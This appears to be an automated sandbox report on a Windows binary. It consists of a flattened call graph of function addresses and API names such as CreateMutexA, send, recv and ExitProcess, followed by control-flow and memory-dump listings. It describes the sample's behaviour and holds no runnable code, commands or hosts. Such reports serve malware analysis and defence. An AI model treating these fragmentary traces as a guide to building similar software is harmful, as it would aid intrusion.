CreateThreadpoolWork 10828->10829 10829->10822 10831 71ceb7 Concurrency::details::_Reschedule_chore 10830->10831 10834 71e45c 10831->10834 10833 71ced1 10833->10823 10835 71e471 TpPostWork 10834->10835 10835->10833 10837 71ce97 10836->10837 10838 71cea7 10836->10838 10837->10838 10840 71e108 10837->10840 10838->10827 10841 71e11d TpReleaseWork 10840->10841 10841->10838 11051 703ee0 11052 703f22 11051->11052 11053 703fd2 11052->11053 11054 703f8c 11052->11054 11057 703f35 std::invalid_argument::invalid_argument 11052->11057 11055 703de0 3 API calls 11053->11055 11058 7034e0 11054->11058 11055->11057 11059 703516 11058->11059 11060 702be0 4 API calls 11059->11060 11062 70354e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 11059->11062 11061 70359e 11060->11061 11061->11062 11063 702b00 3 API calls 11061->11063 11062->11057 11063->11062 11341 701fa0 11342 71dd1b __Mtx_init_in_situ 2 API calls 11341->11342 11343 701fac 11342->11343 11309 73a1e1 11310 739e37 3 API calls 11309->11310 11311 73a1ff 11310->11311 10504 70a326 10505 70a362 shared_ptr 10504->10505 10506 70a340 10504->10506 10506->10505 10507 70a423 Sleep CreateMutexA 10506->10507 10508 70a45e 10507->10508 11161 7060a6 11163 7060ba shared_ptr 11161->11163 11162 70613e shared_ptr std::invalid_argument::invalid_argument 11163->11162 11164 705d40 3 API calls 11163->11164 11165 706231 11164->11165 11166 7021c0 3 API calls 11165->11166 11167 706249 shared_ptr 11166->11167 11168 705d40 3 API calls 11167->11168 11174 7063d2 shared_ptr std::invalid_argument::invalid_argument 11167->11174 11169 7062bd 11168->11169 11170 7021c0 3 API calls 11169->11170 11172 7062d7 shared_ptr 11170->11172 11171 705d40 3 API calls 11171->11172 11172->11171 11173 7021c0 3 API calls 11172->11173 11172->11174 11173->11172 11344 71e7a6 11345 71e7b6 11344->11345 11346 71e7bf 11345->11346 11348 71e82e 11345->11348 11349 71e83c SleepConditionVariableCS 11348->11349 11351 71e855 11348->11351 11349->11351 11351->11345 11292 70c929 11294 70c960 11292->11294 11295 70c942 shared_ptr 11292->11295 11293 70cd5a shared_ptr std::invalid_argument::invalid_argument 11294->11295 11296 705d40 3 API calls 11294->11296 11295->11293 11297 705d40 3 API calls 11295->11297 11298 70c9db 11296->11298 11300 70cdf5 11297->11300 11299 70c290 3 API calls 11298->11299 11299->11295 11301 705d40 3 API calls 11300->11301 11302 70ce27 11301->11302 11303 705d40 3 API calls 11302->11303 11304 70ce43 shared_ptr 11303->11304 11069 70daeb 11070 71dd3c GetSystemTimePreciseAsFileTime 11069->11070 11074 70dafe __Mtx_unlock 11070->11074 11071 70db62 11072 71d8fa 4 API calls 11071->11072 11073 70db68 11072->11073 11074->11071 11075 70dac3 std::invalid_argument::invalid_argument 11074->11075 11076 71d8fa 4 API calls 11074->11076 11076->11071 11077 70d6ee 11078 70d72c __Mtx_unlock 11077->11078 11079 70d8b7 11078->11079 11080 70d76d 11078->11080 11081 71d8fa 4 API calls 11079->11081 11095 70d3f0 11080->11095 11083 70d7ed 11081->11083 11084 71d8fa 4 API calls 11083->11084 11093 70d7f8 shared_ptr __Mtx_unlock 11083->11093 11084->11093 11085 70d7e0 11086 71dd3c GetSystemTimePreciseAsFileTime 11085->11086 11086->11083 11087 71d8fa 4 API calls 11088 70d8c9 11087->11088 11089 70d77f 11089->11085 11090 70d7ce 11089->11090 11091 70d3f0 8 API calls 11089->11091 11092 70d3f0 8 API calls 11090->11092 11091->11089 11092->11085 11093->11087 11094 70d879 shared_ptr std::invalid_argument::invalid_argument 11093->11094 11096 71dd3c GetSystemTimePreciseAsFileTime 11095->11096 11097 70d410 11096->11097 11098 70d4fb 11097->11098 11099 70d41b 11097->11099 11101 71d8fa 4 API calls 11098->11101 11100 70d434 send 11099->11100 11102 70d451 11099->11102 11100->11099 11100->11102 11106 70d4cf __Mtx_unlock 11101->11106 11103 70d470 send 11102->11103 11108 70d48d 11102->11108 11103->11102 11103->11108 11104 71d8fa 4 API calls 11105 70d507 __cftof 11104->11105 11110 70d879 shared_ptr std::invalid_argument::invalid_argument 11105->11110 11111 71dd3c GetSystemTimePreciseAsFileTime 11105->11111 11106->11104 11109 70d4e8 std::invalid_argument::invalid_argument 11106->11109 11107 70d4b2 send 11107->11108 11108->11106 11108->11107 11109->11089 11110->11089 11112 70d6e2 11111->11112 11112->11110 11113 71d8fa 4 API calls 11112->11113 11114 70d8ad 11113->11114 11115 71d8fa 4 API calls 11114->11115 11116 70d8bd 11115->11116 11117 71d8fa 4 API calls 11116->11117 11118 70d8c3 11117->11118 11119 71d8fa 4 API calls 11118->11119 11120 70d8c9 11119->11120 10596 708450 10597 7084a8 shared_ptr 10596->10597 10599 7085ba 10596->10599 10597->10599 10600 705d40 10597->10600 10602 705d84 shared_ptr __cftof 10600->10602 10601 705e5c shared_ptr std::invalid_argument::invalid_argument 10601->10597 10602->10601 10603 705d40 3 API calls 10602->10603 10604 706231 10603->10604 10614 7021c0 10604->10614 10606 706249 shared_ptr 10607 705d40 3 API calls 10606->10607 10613 7063d2 shared_ptr std::invalid_argument::invalid_argument 10606->10613 10608 7062bd 10607->10608 10609 7021c0 3 API calls 10608->10609 10611 7062d7 shared_ptr 10609->10611 10610 705d40 3 API calls 10610->10611 10611->10610 10612 7021c0 3 API calls 10611->10612 10611->10613 10612->10611 10613->10597 10617 702180 10614->10617 10618 702196 10617->10618 10621 739dc7 10618->10621 10624 738bb6 10621->10624 10623 7021a4 10623->10606 10625 738bf6 10624->10625 10629 738bde __cftof __dosmaperr std::invalid_argument::invalid_argument 10624->10629 10625->10629 10630 737f9a 10625->10630 10627 738c0e 10638 739171 10627->10638 10629->10623 10631 737fb1 10630->10631 10632 737fba 10630->10632 10631->10627 10632->10631 10633 73bc91 __cftof 3 API calls 10632->10633 10634 737fda 10633->10634 10645 73cc1b 10634->10645 10640 739182 10638->10640 10639 739191 __cftof __dosmaperr 10639->10629 10640->10639 10686 739715 10640->10686 10691 73936f 10640->10691 10696 739395 10640->10696 10706 7394e3 10640->10706 10646 73cc2e 10645->10646 10648 737ff0 10645->10648 10646->10648 10653 740bcb 10646->10653 10649 73cc48 10648->10649 10650 73cc70 10649->10650 10651 73cc5b 10649->10651 10650->10631 10651->10650 10660 73fcd1 10651->10660 10654 740bd7 __cftof 10653->10654 10655 73bc91 __cftof 3 API calls 10654->10655 10656 740be0 __cftof 10655->10656 10657 740c26 10656->10657 10658 73a20f __cftof 3 API calls 10656->10658 10657->10648 10659 740c4b 10658->10659 10661 73bc91 __cftof 3 API calls 10660->10661 10662 73fcdb 10661->10662 10665 73fbe9 10662->10665 10664 73fce1 10664->10650 10666 73fbf5 __cftof __freea 10665->10666 10667 73fc16 10666->10667 10668 73a20f __cftof 3 API calls 10666->10668 10667->10664 10669 73fc88 10668->10669 10670 73fcc4 10669->10670 10674 73bd4e 10669->10674 10670->10664 10675 73bd59 __dosmaperr __freea 10674->10675 10676 73a20f __cftof GetPEB ExitProcess GetPEB 10675->10676 10678 73bdde 10675->10678 10677 73bde7 10676->10677 10679 73fad0 10678->10679 10680 73fbe9 __cftof GetPEB ExitProcess GetPEB 10679->10680 10681 73fae3 10680->10681 10682 73f879 __cftof GetPEB ExitProcess GetPEB 10681->10682 10683 73faeb __cftof 10682->10683 10684 73fce4 __cftof GetPEB ExitProcess GetPEB 10683->10684 10685 73fafc __cftof __dosmaperr __freea 10683->10685 10684->10685 10685->10670 10687 739725 10686->10687 10688 73971e 10686->10688 10687->10640 10715 7390fd 10688->10715 10690 739724 10690->10640 10692 739378 10691->10692 10693 73937f 10691->10693 10694 7390fd 3 API calls 10692->10694 10693->10640 10695 73937e 10694->10695 10695->10640 10698 73939c 10696->10698 10699 7393b6 __cftof __dosmaperr 10696->10699 10697 739516 10704 739524 10697->10704 10705 739538 10697->10705 10733 7397ee 10697->10733 10698->10697 10698->10699 10700 73954f 10698->10700 10698->10704 10699->10640 10700->10705 10729 73993d 10700->10729 10704->10705 10737 739c97 10704->10737 10705->10640 10707 739516 10706->10707 10709 7394fc 10706->10709 10710 7397ee 3 API calls 10707->10710 10713 739524 10707->10713 10714 739538 10707->10714 10708 73954f 10711 73993d 3 API calls 10708->10711 10708->10714 10709->10707 10709->10708 10709->10713 10710->10713 10711->10713 10712 739c97 3 API calls 10712->10714 10713->10712 10713->10714 10714->10640 10716 73910f __dosmaperr 10715->10716 10719 73a0d9 10716->10719 10718 739132 __dosmaperr 10718->10690 10720 73a0f4 10719->10720 10723 739e37 10720->10723 10722 73a0fe 10722->10718 10724 739e49 10723->10724 10725 737f9a __cftof GetPEB ExitProcess GetPEB 10724->10725 10728 739e5e __cftof __dosmaperr 10724->10728 10727 739e8e 10725->10727 10726 73a085 GetPEB ExitProcess GetPEB 10726->10727 10727->10726 10727->10728 10728->10722 10731 739958 10729->10731 10730 73998a 10730->10704 10731->10730 10741 73ddbf 10731->10741 10734 739807 10733->10734 10748 73e8f9 10734->10748 10736 7398ba 10736->10704 10736->10736 10739 739d0a std::invalid_argument::invalid_argument 10737->10739 10740 739cb4 10737->10740 10738 73ddbf __cftof 3 API calls 10738->10740 10739->10705 10740->10738 10740->10739 10744 73dc64 10741->10744 10743 73ddd7 10743->10730 10745 73dc74 10744->10745 10746 737f9a __cftof GetPEB ExitProcess GetPEB 10745->10746 10747 73dc79 __cftof __dosmaperr 10745->10747 10746->10747 10747->10743 10749 73e91f 10748->10749 10760 73e909 __cftof __dosmaperr 10748->10760 10750 73e9b6 10749->10750 10751 73e9bb 10749->10751 10749->10760 10753 73ea15 10750->10753 10754 73e9df 10750->10754 10761 73e110 10751->10761 10778 73e429 10753->10778 10755 73e9e4 10754->10755 10756 73e9fd 10754->10756 10767 73e76f 10755->10767 10774 73e613 10756->10774 10760->10736 10762 73e122 10761->10762 10763 737f9a __cftof GetPEB ExitProcess GetPEB 10762->10763 10764 73e136 10763->10764 10765 73e429 GetPEB ExitProcess GetPEB 10764->10765 10766 73e13e __alldvrm __cftof __dosmaperr _strrchr 10764->10766 10765->10766 10766->10760 10768 73e79d 10767->10768 10769 73e80f 10768->10769 10771 73e7e8 10768->10771 10772 73e7d6 10768->10772 10770 73e4cb GetPEB ExitProcess GetPEB 10769->10770 10770->10772 10771->10771 10773 73e69e GetPEB ExitProcess GetPEB 10771->10773 10772->10760 10773->10772 10775 73e640 10774->10775 10776 73e67f 10775->10776 10777 73e69e GetPEB ExitProcess GetPEB 10775->10777 10776->10760 10777->10776 10779 73e441 10778->10779 10780 73e4a6 10779->10780 10781 73e4cb GetPEB ExitProcess GetPEB 10779->10781 10780->10760 10781->10780 10842 702a10 10843 702a1a 10842->10843 10844 702a1c 10842->10844 10847 71d8fa 10844->10847 10848 71d922 10847->10848 10849 71d904 10847->10849 10848->10848 10849->10848 10851 71d927 10849->10851 10854 7029e0 10851->10854 10853 71d93e Concurrency::cancel_current_task 10865 71d56f 10854->10865 10856 7029ff 10856->10853 10857 7029f4 __cftof 10857->10856 10858 73bc91 __cftof 3 API calls 10857->10858 10862 73835c 10858->10862 10859 73a20f __cftof 3 API calls 10860 738386 10859->10860 10861 738395 10860->10861 10868 73801d 10860->10868 10861->10853 10862->10859 10864 7383bd __freea 10864->10853 10871 71e2c1 10865->10871 10869 737f9a __cftof 3 API calls 10868->10869 10870 73802f 10869->10870 10870->10864 10872 71e2cf InitOnceExecuteOnce 10871->10872 10874 71d582 10871->10874 10872->10874 10874->10857 11121 70d8d0 11122 70d911 recv 11121->11122 11123 70d932 recv 11122->11123 11125 70d967 recv 11123->11125 11127 70d9a1 11125->11127 11175 702a90 11176 702ace 11175->11176 11177 71ce8b TpReleaseWork 11176->11177 11178 702adb shared_ptr std::invalid_argument::invalid_argument 11177->11178 11128 7380d4 11129 7380e2 11128->11129 11130 7380ec 11128->11130 11131 73801d 3 API calls 11130->11131 11132 738106 __freea 11131->11132 10782 70205a 10783 71dd8c InitializeCriticalSectionEx 10782->10783 10784 702064 10783->10784 11133 70d2dc 11135 70d2e9 shared_ptr 11133->11135 11134 70d352 shared_ptr std::invalid_argument::invalid_argument 11135->11134 11136 71dd3c GetSystemTimePreciseAsFileTime 11135->11136 11137 70d410 11136->11137 11138 70d4fb 11137->11138 11139 70d41b 11137->11139 11141 71d8fa 4 API calls 11138->11141 11140 70d434 send 11139->11140 11142 70d451 11139->11142 11140->11139 11140->11142 11145 70d4cf __Mtx_unlock 11141->11145 11143 70d470 send 11142->11143 11147 70d48d 11142->11147 11143->11142 11143->11147 11144 71d8fa 4 API calls 11150 70d507 __cftof 11144->11150 11145->11144 11148 70d4e8 std::invalid_argument::invalid_argument 11145->11148 11146 70d4b2 send 11146->11147 11147->11145 11147->11146 11149 70d879 shared_ptr std::invalid_argument::invalid_argument 11150->11149 11151 71dd3c GetSystemTimePreciseAsFileTime 11150->11151 11152 70d6e2 11151->11152 11152->11149 11153 71d8fa 4 API calls 11152->11153 11154 70d8ad 11153->11154 11155 71d8fa 4 API calls 11154->11155 11156 70d8bd 11155->11156 11157 71d8fa 4 API calls 11156->11157 11158 70d8c3 11157->11158 11159 71d8fa 4 API calls 11158->11159 11160 70d8c9 11159->11160 11253 71e75c 11254 71e76b 11253->11254 11255 71e814 11254->11255 11256 71e810 RtlWakeAllConditionVariable 11254->11256 11179 703e9f 11180 703eb6 11179->11180 11181 703ead 11179->11181 11183 702310 11181->11183 11184 702324 11183->11184 11187 71cbbd 11184->11187 11195 73517a 11187->11195 11189 70232a 11189->11180 11190 71cc35 ___std_exception_copy 11202 71c83d 11190->11202 11192 71cc28 11198 71c5e6 11192->11198 11206 7365b9 11195->11206 11197 71cbe5 11197->11189 11197->11190 11197->11192 11199 71c62f ___std_exception_copy 11198->11199 11201 71c642 shared_ptr 11199->11201 11212 71ca2f 11199->11212 11201->11189 11203 71c868 11202->11203 11205 71c871 shared_ptr 11202->11205 11204 71ca2f 4 API calls 11203->11204 11204->11205 11205->11189 11207 7365be __cftof 11206->11207 11207->11197 11208 73ec54 __cftof 3 API calls 11207->11208 11211 73a21f __cftof 11207->11211 11208->11211 11209 737c7d __cftof 3 API calls 11210 73a252 11209->11210 11211->11209 11213 71d56f InitOnceExecuteOnce 11212->11213 11214 71ca71 11213->11214 11215 71ca78 11214->11215 11216 73834b 3 API calls 11214->11216 11215->11201 11217 71caae 11216->11217 11218 71d56f InitOnceExecuteOnce 11217->11218 11219 71caf1 11218->11219 11220 71caf8 11219->11220 11221 73834b 3 API calls 11219->11221 11220->11201 11222 71cb2e 11221->11222 11222->11201 11312 70d5df 11314 70d5e3 __cftof __dosmaperr 11312->11314 11313 70d879 shared_ptr std::invalid_argument::invalid_argument 11314->11313 11315 71dd3c GetSystemTimePreciseAsFileTime 11314->11315 11316 70d6e2 11315->11316 11316->11313 11317 71d8fa 4 API calls 11316->11317 11318 70d8ad 11317->11318 11319 71d8fa 4 API calls 11318->11319 11320 70d8bd 11319->11320 11321 71d8fa 4 API calls 11320->11321 11322 70d8c3 11321->11322 11323 71d8fa 4 API calls 11322->11323 11324 70d8c9 11323->11324 10890 708600 10891 70864c 10890->10891 10892 705d40 3 API calls 10891->10892 10894 708667 shared_ptr 10892->10894 10893 7087d1 shared_ptr std::invalid_argument::invalid_argument 10894->10893 10895 705d40 3 API calls 10894->10895 10897 70886a shared_ptr 10895->10897 10896 70894e shared_ptr std::invalid_argument::invalid_argument 10897->10896 10898 705d40 3 API calls 10897->10898 10899 7089ea shared_ptr std::invalid_argument::invalid_argument 10898->10899 11305 702d00 11306 702d28 11305->11306 11307 71dd1b __Mtx_init_in_situ 2 API calls 11306->11307 11308 702d33 11307->11308 10900 70da05 10901 70da15 10900->10901 10904 719e60 10901->10904 10903 70da4a std::invalid_argument::invalid_argument 10905 719eba __cftof 10904->10905 10911 71b240 10905->10911 10909 719f69 std::_Throw_future_error 10910 719efc std::invalid_argument::invalid_argument 10910->10903 10924 71b580 10911->10924 10913 71b275 10928 702be0 10913->10928 10915 71b2a6 10937 71b600 10915->10937 10917 719ee4 10917->10910 10918 7042f0 10917->10918 10919 71d56f InitOnceExecuteOnce 10918->10919 10920 70430a 10919->10920 10921 704311 10920->10921 10922 73834b 3 API calls 10920->10922 10921->10909 10923 704324 10922->10923 10925 71b59c 10924->10925 10926 71dd1b __Mtx_init_in_situ 2 API calls 10925->10926 10927 71b5a7 10926->10927 10927->10913 10929 702c1d 10928->10929 10930 71d56f InitOnceExecuteOnce 10929->10930 10931 702c46 10930->10931 10932 702c88 10931->10932 10933 702c51 std::invalid_argument::invalid_argument 10931->10933 10942 71d587 10931->10942 10949 702340 10932->10949 10933->10915 10938 71b67f shared_ptr 10937->10938 10940 71b6e8 10938->10940 10972 71b8a0 10938->10972 10941 71b6cb 10941->10917 10943 71d593 Concurrency::cancel_current_task 10942->10943 10944 71d603 10943->10944 10945 71d5fa 10943->10945 10947 7029e0 4 API calls 10944->10947 10952 71d50f 10945->10952 10948 71d5ff 10947->10948 10948->10932 10967 71cc66 10949->10967 10951 702372 10953 71e2c1 InitOnceExecuteOnce 10952->10953 10954 71d527 10953->10954 10955 71d52e 10954->10955 10958 73834b 10954->10958 10955->10948 10957 71d537 10957->10948 10959 738357 __cftof 10958->10959 10960 73bc91 __cftof 3 API calls 10959->10960 10961 73835c 10960->10961 10962 73a20f __cftof 3 API calls 10961->10962 10963 738386 10962->10963 10964 73801d 3 API calls 10963->10964 10965 738395 10963->10965 10966 7383bd __freea 10964->10966 10965->10957 10966->10957 10968 71cc81 Concurrency::cancel_current_task 10967->10968 10969 73a20f __cftof 3 API calls 10968->10969 10971 71cce8 __cftof std::invalid_argument::invalid_argument 10968->10971 10970 71cd2f 10969->10970 10971->10951 10973 71b920 10972->10973 10979 718800 10973->10979 10975 71b95c shared_ptr 10976 71bb4e shared_ptr 10975->10976 10977 703de0 3 API calls 10975->10977 10976->10941 10978 71bb36 10977->10978 10978->10941 10980 718841 10979->10980 10987 703870 10980->10987 10982 718a76 std::invalid_argument::invalid_argument 10982->10975 10983 7188dd __cftof 10983->10982 10984 71dd1b __Mtx_init_in_situ 2 API calls 10983->10984 10985 718a31 10984->10985 10992 702dc0 10985->10992 10988 71dd1b __Mtx_init_in_situ 2 API calls 10987->10988 10989 7038a7 10988->10989 10990 71dd1b __Mtx_init_in_situ 2 API calls 10989->10990 10991 7038e6 10990->10991 10991->10983 10993 702e06 10992->10993 10996 702e6f 10992->10996 11026 71dd3c 10993->11026 10997 702eef 10996->10997 11003 71dd3c GetSystemTimePreciseAsFileTime 10996->11003 10997->10982 10998 702f1e 10999 71d8fa 4 API calls 10998->10999 11000 702f24 10999->11000 11001 71d8fa 4 API calls 11000->11001 11004 702eb9 11001->11004 11002 702e1d __Mtx_unlock 11002->10996 11002->11000 11003->11004 11005 71d8fa 4 API calls 11004->11005 11006 702ec0 __Mtx_unlock 11004->11006 11005->11006 11007 71d8fa 4 API calls 11006->11007 11008 702ed8 __Cnd_broadcast 11006->11008 11007->11008 11008->10997 11009 71d8fa 4 API calls 11008->11009 11010 702f3c 11009->11010 11011 71dd3c GetSystemTimePreciseAsFileTime 11010->11011 11015 702f80 shared_ptr __Mtx_unlock 11011->11015 11012 7030c5 11013 71d8fa 4 API calls 11012->11013 11014 7030cb 11013->11014 11016 71d8fa 4 API calls 11014->11016 11015->11012 11015->11014 11019 7030a7 std::invalid_argument::invalid_argument 11015->11019 11022 71dd3c GetSystemTimePreciseAsFileTime 11015->11022 11017 7030d1 11016->11017 11018 71d8fa 4 API calls 11017->11018 11023 703093 __Mtx_unlock 11018->11023 11019->10982 11020 71d8fa 4 API calls 11021 7030dd 11020->11021 11024 70305f 11022->11024 11023->11019 11023->11020 11024->11012 11024->11017 11024->11023 11029 71d3dc 11024->11029 11032 71dae2 11026->11032 11028 702e12 11028->10998 11028->11002 11045 71d202 11029->11045 11031 71d3ec 11031->11024 11033 71db0a std::invalid_argument::invalid_argument 11032->11033 11034 71db38 11032->11034 11033->11028 11034->11033 11038 71e5fb 11034->11038 11036 71db8d __Xtime_diff_to_millis2 11036->11033 11037 71e5fb _xtime_get GetSystemTimePreciseAsFileTime 11036->11037 11037->11036 11039 71e60a 11038->11039 11041 71e617 __aulldvrm 11038->11041 11039->11041 11042 71e5d4 11039->11042 11041->11036 11043 71e27a __Xtime_get_ticks GetSystemTimePreciseAsFileTime 11042->11043 11044 71e5e2 11043->11044 11044->11041 11046 71d22c 11045->11046 11047 71e5fb _xtime_get GetSystemTimePreciseAsFileTime 11046->11047 11048 71d234 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11046->11048 11049 71d25f __Xtime_diff_to_millis2 11047->11049 11048->11031 11049->11048 11050 71e5fb _xtime_get GetSystemTimePreciseAsFileTime 11049->11050 11050->11048 11257 703b47 11258 703b51 11257->11258 11261 703b5f 11258->11261 11264 7031d0 11258->11264 11259 703b68 11261->11259 11283 703710 11261->11283 11265 71dd3c GetSystemTimePreciseAsFileTime 11264->11265 11272 703214 11265->11272 11266 70326b 11267 71d8fa 4 API calls 11266->11267 11268 70323c __Mtx_unlock 11267->11268 11270 71d8fa 4 API calls 11268->11270 11273 703250 std::invalid_argument::invalid_argument 11268->11273 11269 71d3dc GetSystemTimePreciseAsFileTime 11269->11272 11271 703277 11270->11271 11274 71dd3c GetSystemTimePreciseAsFileTime 11271->11274 11272->11266 11272->11268 11272->11269 11273->11261 11275 7032af 11274->11275 11276 71d8fa 4 API calls 11275->11276 11277 7032b6 __Cnd_broadcast 11275->11277 11276->11277 11278 71d8fa 4 API calls 11277->11278 11279 7032d7 __Mtx_unlock 11277->11279 11278->11279 11280 71d8fa 4 API calls 11279->11280 11281 7032eb 11279->11281 11282 70330e 11280->11282 11281->11261 11282->11261 11284 70371c 11283->11284 11285 702340 3 API calls 11284->11285 11286 70373e 11285->11286 11352 70958c 11353 7095ac shared_ptr 11352->11353 11354 70a423 Sleep CreateMutexA 11353->11354 11355 70961b shared_ptr 11353->11355 11356 70a45e 11354->11356 11223 70c48d 11231 70c498 shared_ptr 11223->11231 11224 70c61d shared_ptr std::invalid_argument::invalid_argument 11225 70c645 11227 705d40 3 API calls 11225->11227 11226 705d40 3 API calls 11226->11231 11229 70c6ad 11227->11229 11236 70c290 11229->11236 11231->11224 11231->11225 11231->11226 11232 708b00 11231->11232 11233 708b50 11232->11233 11234 705d40 3 API calls 11233->11234 11235 708b6a shared_ptr std::invalid_argument::invalid_argument 11234->11235 11235->11231 11242 70c2fd 11236->11242 11237 70c61d shared_ptr std::invalid_argument::invalid_argument 11238 705d40 3 API calls 11238->11242 11239 708b00 3 API calls 11239->11242 11240 70c645 11241 705d40 3 API calls 11240->11241 11243 70c6ad 11241->11243 11242->11237 11242->11238 11242->11239 11242->11240 11244 70c290 3 API calls 11243->11244 11357 73d18d 11358 73d1b7 11357->11358 11360 73d19d __cftof __dosmaperr 11357->11360 11359 737f9a __cftof 3 API calls 11358->11359 11358->11360 11359->11360 11361 703b8e 11362 703b98 11361->11362 11363 702310 4 API calls 11362->11363 11364 703ba5 11362->11364 11363->11364 11365 703bcf 11364->11365 11366 703710 3 API calls 11364->11366 11367 703710 3 API calls 11365->11367 11366->11365 11368 703bdb 11367->11368

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00737BBB Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 304 737bbb-737bc8 call 73b922 307 737bea-737bfc call 737bfd ExitProcess 304->307 308 737bca-737bd8 GetPEB 304->308 308->307 309 737bda-737be9 308->309 309->307
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00737BBA,?,?,?,?,?,00738C0E), ref: 00737BF6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
